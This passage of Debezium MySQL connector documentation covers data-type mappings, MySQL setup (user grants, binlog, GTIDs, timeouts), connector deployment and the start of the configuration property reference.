connector configuration property. For `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value `1970-01-01 00:00:00` is used as the default value in the Kafka Connect schema. \n\nMySQL allows zero-values for `DATE, `DATETIME`, and `TIMESTAMP` columns because zero-values are sometimes preferred over null values. The MySQL connector represents zero-values as null values when the column definition allows null values, or as the epoch day when the column does not allow null values.\n\n.Temporal values without time zones\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\". As you can see, there is no time zone information. Such columns are converted into epoch milliseconds or microseconds based on the column\u2019s precision by using UTC. The `TIMESTAMP` type represents a timestamp without time zone information. It is converted by MySQL from the server (or session\u2019s) current time zone into UTC when writing and from UTC into the server (or session's) current time zone when reading back the value. For example:\n\n* `DATETIME` with a value of `2018-06-20 06:37:03` becomes `1529476623000`.\n* `TIMESTAMP` with a value of `2018-06-20 06:37:03` becomes `2018-06-20T13:37:03Z`.\n\nSuch columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server (or session\u2019s) current time zone. The time zone will be queried from the server by default. If this fails, it must be specified explicitly by the database `serverTimezone` MySQL configuration option. For example, if the database\u2019s time zone (either globally or configured for the connector by means of the `serverTimezone` option) is \"America\/Los_Angeles\", the TIMESTAMP value \"2018-06-20 06:37:03\" is represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nThe time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\nMore details about properties related to termporal values are in the documentation for {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\ntime.precision.mode=adaptive_time_microseconds(default)::\nThe MySQL connector determines the literal type and semantic type based on the column's data type definition so that events represent exactly the values in the database. All time fields are in microseconds. Only positive `TIME` field values in the range of `00:00:00.000000` to `23:59:59.999999` can be captured correctly.\n+\n.Mappings when `time.precision.mode=adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`io.debezium.time.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`io.debezium.time.MicroTime` +\nRepresents the time value in microseconds and does not include time zone information. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME, DATETIME(0), DATETIME(1), DATETIME(2), DATETIME(3)`\n|`INT64`\na|`io.debezium.time.Timestamp` +\nRepresents the number of milliseconds past the epoch and does not include time zone information.\n\n|`DATETIME(4), DATETIME(5), DATETIME(6)`\n|`INT64`\na|`io.debezium.time.MicroTimestamp` +\nRepresents the number of microseconds past the epoch and does not include time zone information.\n\n|===\n\ntime.precision.mode=connect::\nThe MySQL connector uses defined Kafka Connect logical types. This approach is less precise than the default approach and the events could be less precise if the database column has a _fractional second precision_ value of greater than `3`. Values in only the range of `00:00:00.000` to `23:59:59.999` can be handled. Set `time.precision.mode=connect` only if you can ensure that the `TIME` values in your tables never exceed the supported ranges. The `connect` setting is expected to be removed in a future version of {prodname}.\n+\n.Mappings when `time.precision.mode=connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`org.apache.kafka.connect.data.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Time` +\nRepresents the time value in microseconds since midnight and does not include time zone information.\n\n|`DATETIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Timestamp` +\nRepresents the number of milliseconds since the epoch, and does not include time zone information.\n\n|===\n\n[id=\"mysql-decimal-types\"]\n=== Decimal types\n\n{prodname} connectors handle decimals according to the setting of the {link-prefix}:{link-mysql-connector}#mysql-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property]. \n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handing.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handing.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handing.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n[id=\"mysql-boolean-values\"]\n=== Boolean values\n\nMySQL handles the `BOOLEAN` value internally in a specific way.\nThe `BOOLEAN` column is internally mapped to the `TINYINT(1)` data type.\nWhen the table is created during streaming then it uses proper `BOOLEAN` mapping as {prodname} receives the original DDL.\nDuring snapshots, {prodname} executes `SHOW CREATE TABLE` to obtain table definitions that return `TINYINT(1)` for both `BOOLEAN` and `TINYINT(1)` columns. {prodname} then has no way to obtain the original type mapping and so maps to `TINYINT(1)`.\n\nifdef::community[]\nThe operator can configure the out-of-the-box {link-prefix}:{link-custom-converters}[`TinyIntOneToBooleanConverter` custom converter] that would either map all `TINYINT(1)` columns to `BOOLEAN` or if the `selector` parameter is set then a subset of columns could be enumerated using comma-separated regular expressions.\nendif::community[]\n\nFollowing is an example configuration:\n\n----\nconverters=boolean\nboolean.type=io.debezium.connector.mysql.converters.TinyIntOneToBooleanConverter\nboolean.selector=db1.table1.*, db1.table2.column1\n----\n\n[id=\"mysql-spatial-types\"]\n=== Spatial types\n\nCurrently, the {prodname} MySQL connector supports the following spatial data types.\n\n.Description of spatial type mappings\n[cols=\"35%a,15%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\nContains a structure with two fields:\n\n* `srid (INT32`: spatial reference system ID that defines the type of geometry object stored in the structure\n* `wkb (BYTES)`: binary representation of the geometry object encoded in the Well-Known-Binary (wkb) format. See the link:https:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium] for more details.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mysql-to-run-a-debezium-connector\n\/\/ Title: Setting up MySQL to run a {prodname} connector\n[[setting-up-mysql]]\n== Set up\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:creating-a-mysql-user-for-a-debezium-connector[]\n* xref:enabling-the-mysql-binlog-for-debezium[]\n* xref:enabling-mysql-gtids-for-debezium[]\n* xref:configuring-mysql-session-timeouts-for-debezium[]\n* xref:enabling-query-log-events-for-debezium-mysql-connectors[]\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: creating-a-mysql-user-for-a-debezium-connector\n\/\/ Title: Creating a MySQL user for a {prodname} connector\n[[mysql-creating-user]]\n=== Creating a user \n\nA {prodname} MySQL connector requires a MySQL user account. This MySQL user must have appropriate permissions on all databases for which the {prodname} MySQL connector captures changes.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n\n.Procedure\n\n. Create the MySQL user:\n+\n[source,SQL]\n----\nmysql> CREATE USER 'user'@'localhost' IDENTIFIED BY 'password';\n----\n\n. Grant the required permissions to the user:\n+\n[source,SQL]\n----\nmysql> GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'user' IDENTIFIED BY 'password';\n----\n+\nThe table below describes the permissions. \n+\nIMPORTANT: If using a hosted option such as Amazon RDS or Amazon Aurora that does not allow a global read lock, table-level locks are used to create the _consistent snapshot_. In this case, you need to also grant `LOCK_TABLES` permissions to the user that you create. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for more details.\n\n. Finalize the user's permissions:\n+\n[source,SQL]\n----\nmysql> FLUSH PRIVILEGES;\n----\n\n[[permissions-explained-mysql-connector]]\n.Descriptions of user permissions\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Keyword |Description\n\n|`SELECT`\n|Enables the connector to select rows from tables in databases. This is used only when performing a snapshot.\n\n|`RELOAD`\n|Enables the connector the use of the `FLUSH` statement to clear or reload internal caches, flush tables, or acquire locks. This is used only when performing a snapshot.\n\n|`SHOW DATABASES`\n|Enables the connector to see database names by issuing the `SHOW DATABASE` statement. This is used only when performing a snapshot.\n\n|`REPLICATION SLAVE`\n|Enables the connector to connect to and read the MySQL server binlog.\n\n|`REPLICATION CLIENT`\na|Enables the connector the use of the following statements:\n\n* `SHOW MASTER STATUS`\n* `SHOW SLAVE STATUS`\n* `SHOW BINARY LOGS`\n\nThe connector always requires this.\n\n|`ON`\n|Identifies the database to which the permissions apply.\n\n|`TO 'user'`\n|Specifies the user to grant the permissions to.\n\n|`IDENTIFIED BY 'password'`\n|Specifies the user's MySQL password.\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-the-mysql-binlog-for-debezium\n\/\/ Title: Enabling the MySQL binlog for {prodname}\n[[enable-mysql-binlog]]\n=== Enabling the binlog \n\nYou must enable binary logging for MySQL replication. The binary logs record transaction updates for replication tools to propagate changes. \n\n.Prerequisites\n\n* A MySQL server.\n* Appropriate MySQL user privileges.\n\n.Procedure\n\n. Check whether the `log-bin` option is already on:\n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n. If it is `OFF`, configure your MySQL server configuration file with the following properties, which are described in the table below:\n+\n[source,properties]\n----\nserver-id = 223344 \nlog_bin = mysql-bin \nbinlog_format = ROW \nbinlog_row_image = FULL \nexpire_logs_days = 10 \n----\n\n. Confirm your changes by checking the binlog status once more: \n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n[[binlog-configuration-properties-mysql-connector]]\n.Descriptions of MySQL binlog configuration properties\n[cols=\"1,4\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Description\n\n|`server-id`\n|The value for the `server-id` must be unique for each server and replication client in the MySQL cluster. During MySQL connector set up, {prodname} assigns a unique server ID to the connector.\n\n|`log_bin`\n|The value of `log_bin` is the base name of the sequence of binlog files.\n\n|`binlog_format`\n|The `binlog-format` must be set to `ROW` or `row`.\n\n|`binlog_row_image`\n|The `binlog_row_image` must be set to `FULL` or `full`.\n\n|`expire_logs_days`\n|This is the number of days for automatic binlog file removal. The default is `0`, which means no automatic removal. Set the value to match the needs of your environment. See {link-prefix}:{link-mysql-connector}#mysql-purges-binlog-files-used-by-debezium[MySQL purges binlog files].\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-mysql-gtids-for-debezium\n\/\/ Title: Enabling MySQL Global Transaction Identifiers for {prodname}\n[[enable-mysql-gtids]]\n=== Enabling GTIDs\n\nGlobal transaction identifiers (GTIDs) uniquely identify transactions that occur on a server within a cluster. Though not required for a {prodname} MySQL connector, using GTIDs simplifies replication and enables you to more easily confirm if primary and replica servers are consistent.\n\nGTIDs are available in MySQL 5.6.5 and later. See the link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for more details.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Enable `gtid_mode`:\n+\n[source,SQL]\n----\nmysql> gtid_mode=ON\n----\n\n. Enable `enforce_gtid_consistency`:\n+\n[source,SQL]\n----\nmysql> enforce_gtid_consistency=ON\n----\n\n. Confirm the changes:\n+\n[source,SQL]\n----\nmysql> show global variables like '%GTID%';\n----\n\n.Result\n[source,SQL]\n----\n+--------------------------+-------+\n| Variable_name | Value |\n+--------------------------+-------+\n| enforce_gtid_consistency | ON |\n| gtid_mode | ON |\n+--------------------------+-------+\n----\n\n.Descriptions of GTID options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`gtid_mode`\na|Boolean that specifies whether GTID mode of the MySQL server is enabled or not.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|`enforce_gtid_consistency`\na|Boolean that specifies whether the server enforces GTID consistency by allowing the execution of statements that can be logged in a transactionally safe manner. Required when using GTIDs.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|===\n\n\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-mysql-session-timeouts-for-debezium\n\/\/ Title: Configuring MySQL session timesouts for {prodname}\n[[mysql-session-timeouts]]\n=== Configuring session timeouts\n\nWhen an initial consistent snapshot is made for large databases, your established connection could timeout while the tables are being read. You can prevent this behavior by configuring `interactive_timeout` and `wait_timeout` in your MySQL configuration file.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Configure `interactive_timeout`:\n+\n[source,SQL]\n----\nmysql> interactive_timeout=<duration-in-seconds>\n----\n\n. Configure `wait_timeout`:\n+\n[source,SQL]\n----\nmysql> wait_timeout=<duration-in-seconds>\n----\n\n.Descriptions of MySQL session timeout options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`interactive_timeout`\na|The number of seconds the server waits for activity on an interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_interactive_timeout[MySQL's documentation] for more details.\n\n|`wait_timeout`\na|The number of seconds the server waits for activity on a non-interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_wait_timeout[MySQL's documentation] for more details.\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-query-log-events-for-debezium-mysql-connectors\n\/\/ Title: Enabling query log events for {prodname} MySQL connectors\n[[enable-query-log-events]]\n=== Enabling query log events \n\nYou might want to see the original `SQL` statement for each binlog event. Enabling the `binlog_rows_query_log_events` option in the MySQL configuration file allows you to do this.\n\nThis option is available in MySQL 5.6 and later.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowlede of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n* Enable `binlog_rows_query_log_events`:\n+\n[source,SQL]\n----\nmysql> binlog_rows_query_log_events=ON\n----\n+\n`binlog_rows_query_log_events` is set to a value that enables\/disables support for including the original `SQL` statement in the binlog entry.\n+\n** `ON` = enabled\n** `OFF` = disabled\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-mysql-connectors\n\/\/ Title: Deploying {prodname} MySQL connectors\n[[mysql-deploying-a-connector]]\n== Deployment\n\nifdef::product[]\nTo deploy a {prodname} MySQL connector, install the {prodname} MySQL connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:installing-debezium-mysql-connectors[]\n* xref:debezium-mysql-connector-configuration-example[]\n* xref:adding-debezium-mysql-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-mysql-connector-configuration-properties[]\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ Title: Installing {prodname} MySQL connectors\n[id=\"installing-debezium-mysql-connectors\"]\n=== Installing\n\nTo install a {prodname} MySQL connector, download the connector archive, extract it to your Kafka Connect environment, and ensure that the plug-ins parent directory is specified in your Kafka Connect environment.\n\n.Prerequisites\n\n* link:https:\/\/zookeeper.apache.org\/[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MySQL Server is installed and set up for {prodname}.\n\n.Procedure\n\nifdef::product[]\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[MySQL connector].\nendif::product[]\nifdef::community[]\nifeval::['{page-version}' == 'master']\n. Download the {prodname} link:{link-mysql-plugin-snapshot}[MySQL connector plug-in].\nendif::[]\nifeval::['{page-version}' != 'master']\n. Download the {prodname} link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[MySQL connector plug-in].\nendif::[]\nendif::community[]\n. Extract the files into your Kafka Connect environment.\n. Add the plug-ins parent directory to your Kafka Connect `plugin.path`:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} MySQL connector into the `\/kafka\/connect\/debezium-connector-mysql` path.\n\n. Restart your Kafka Connect process. This ensures that the new JAR files are picked up.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mysql-connector-configuration-example\n\/\/ Title: {prodname} MySQL connector configuration example\n[[mysql-example]]\n[[mysql-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\nTypically, you configure a {prodname} MySQL connector in a `.json` file that sets configuration properties for the connector. Following is an example configuration for a MySQL connector that connects to a MySQL server on port 3306 at 192.168.99.100, whose logical name is `fullfillment`.\n\nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium-user\", \/\/ <5>\n \"database.password\": \"debezium-user-pw\", \/\/ <6>\n \"database.server.id\": \"184054\", <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> Connector's name when registered with the Kafka Connect service.\n<2> Connector's class name.\n<3> MySQL server address.\n<4> MySQL server port number.\n<5> MySQL user with the appropriate privileges.\n<6> MySQL user's password.\n<7> Unique ID of the connector.\n<8> Logical name of the MySQL server or cluster.\n<9> List of databases hosted by the specified server.\n<10> List of Kafka brokers that the connector uses to write and recover DDL statements to the database history topic.\n<11> Name of the database history topic. This topic is for internal use only and should not be used by consumers. \n<12> Flag that specifies if the connector should generate events for DDL changes and emit them to the `fulfillment` schema change topic for use by consumers. \nendif::community[]\n\nifdef::product[]\n\nTypically, you configure a {prodname} MySQL connector in a `.yaml` file that sets connector configuration properties. Following is an example of the configuration for a MySQL connector that connects to a MySQL server on port 3306 and captures changes to the `inventory` database. \nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,yaml,options=\"nowrap\"]\n----\n apiVersion: kafka.strimzi.io\/v1beta1\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mysql.MySqlConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: mysql \/\/ <4>\n database.port: 3306\n database.user: debezium\n database.password: dbz\n database.server.id: 184054 \/\/ <5>\n database.server.name: dbserver1 \/\/ <5>\n database.whitelist: inventory \/\/ <6>\n database.history.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <7>\n database.history.kafka.topic: schema-changes.inventory \/\/ <7>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\nBecause the MySQL connector reads the MySQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the name of the container running the MySQL server (`mysql`).\n\n|5\n|A unique server ID and name.\nThe server name is the logical identifier for the MySQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics.\n\n|6\n|Changes in only the `inventory` database are captured.\n\n|7\n|The connector stores the history of the database schemas in Kafka using this broker (the same broker to which you are sending events) and topic name.\nUpon restart, the connector recovers the schemas of the database that existed at the point in time in the binlog when the connector should begin reading.\n\n|===\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-mysql-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} MySQL connector configuration to Kafka Connect\n[[mysql-adding-configuration]]\n=== Adding connector configuration \nifdef::community[]\nTo start running a MySQL connector, configure a connector and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* {link-prefix}:{link-mysql-connector}#setting-up-mysql[MySQL server] is \nset up for a {prodname} connector.\n\n* {prodname} MySQL connector is installed. \n\n.Procedure\n\n. Create a configuration for the MySQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster. \n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} MySQL connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment. \n\n.Prerequisites\n\n* Podman or Docker is installed.\n* You have sufficient rights to create and manage containers.\n* You downloaded the {prodname} MySQL connector archive. \n\n.Procedure\n\n. Extract the {prodname} MySQL connector archive to create a directory structure for the connector plug-in, for example: \n+\n[subs=\"\"+macros\"]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-mysql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-mysql`, then you would run the following command:\n+\n`podman build -t debezium-container-for-mysql:latest`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-mysql:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=attributes+]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-mysql\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} MySQL connector instance. See {LinkDebeziumUserGuide}#mysql-example-configuration[the connector configuration example].\n\n. Apply the connector instance, for example: \n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines: \n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ... \n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-mysql-connector}#mysql-snapshots[performs a consistent snapshot] of the MySQL databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics. \n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-configuration-properties\n\/\/ Title: Description of {prodname} MySQL connector configuration properties\n[[mysql-connector-properties]]\n=== Connector properties\n\nThe {prodname} MySQL connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:mysql-required-connector-configuration-properties[Required connector configuration properties]\n* xref:mysql-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:mysql-pass-through-configuration-properties[Pass-through configuration properties]\n\n[id=\"mysql-required-connector-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required MySQL connector configuration properties\n[cols=\"33%a,17%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-name]]<<mysql-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name fails. This property is required by all Kafka Connect connectors.\n\n|[[mysql-property-connector-class]]<<mysql-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always specify `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|[[mysql-property-tasks-max]]<<mysql-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[mysql-property-database-hostname]]<<mysql-property-database-hostname, `database.hostname`>>\n|\n|IP address or host name of the MySQL database server.\n\n|[[mysql-property-database-port]]<<mysql-property-database-port, `database.port`>>\n|`3306`\n|Integer port number of the MySQL database server.\n\n|[[mysql-property-database-user]]<<mysql-property-database-user, `database.user`>>\n|\n|Name of the MySQL database to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-password]]<<mysql-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-server-name]]<<mysql-property-database-server-name, `database.server.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster in which {prodname} is capturing changes. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names that receive events emitted by this connector.\nOnly alphanumeric characters and underscores are allowed in this name.\n\n|[[mysql-property-database-server-id]]<<mysql-property-database-server-id, `database.server.id`>>\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though the recommendation is to explicitly set a value. \n\n|[[mysql-property-database-history-kafka-topic]]<<mysql-property-database-history-kafka-topic, `database.history.kafka{zwsp}.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[mysql-property-database-history-kafka-bootstrap-servers]]<<mysql-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses for establishing an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the Kafka Connect process.\n\n|[[mysql-property-database-whitelist]]\n[[mysql-property-database-include-list]]<<mysql-property-database-include-list, `database.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of the databases for which to capture changes. The connector does not capture changes in any database whose name is not in `database.include.list`. By default, the connector captures changes in all databases. \nDo not also set the `database.exclude.list` connector confiuration property.\n\n|[[mysql-property-database-blacklist]]\n[[mysql-property-database-exclude-list]]<<mysql-property-database-exclude-list, `database.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of databases for which you do not want to capture changes. The connector captures changes in any database whose name is not in the `database.exclude.list`. \nDo not also set the `database.include.list` connector configuration property.\n\n|[[mysql-property-table-whitelist]]\n[[mysql-property-table-include-list]]<<mysql-property-table-include-list, `table.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers of tables whose changes you want to capture. The connector does not capture changes in any table not included in `table.include.list`. Each identifier is of the form _databaseName_._tableName_. By default, the connector captures changes in every non-system table in each database whose changes are being captured.\nDo not also specify the `table.exclude.list` connector configuration property.\n\n|[[mysql-property-table-blacklist]]\n[[mysql-property-table-exclude-list]]<<mysql-property-table-exclude-list, `table.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want to capture. The connector captures changes in any table not included in `table.exclude.list`. Each identifier is of the form _databaseName_._tableName_.\nDo not also specify the `table.include.list` connector configuration property.\n\n|[[mysql-property-column-blacklist]]\n[[mysql-property-column-exclude-list]]<<mysql-property-column-exclude-list, 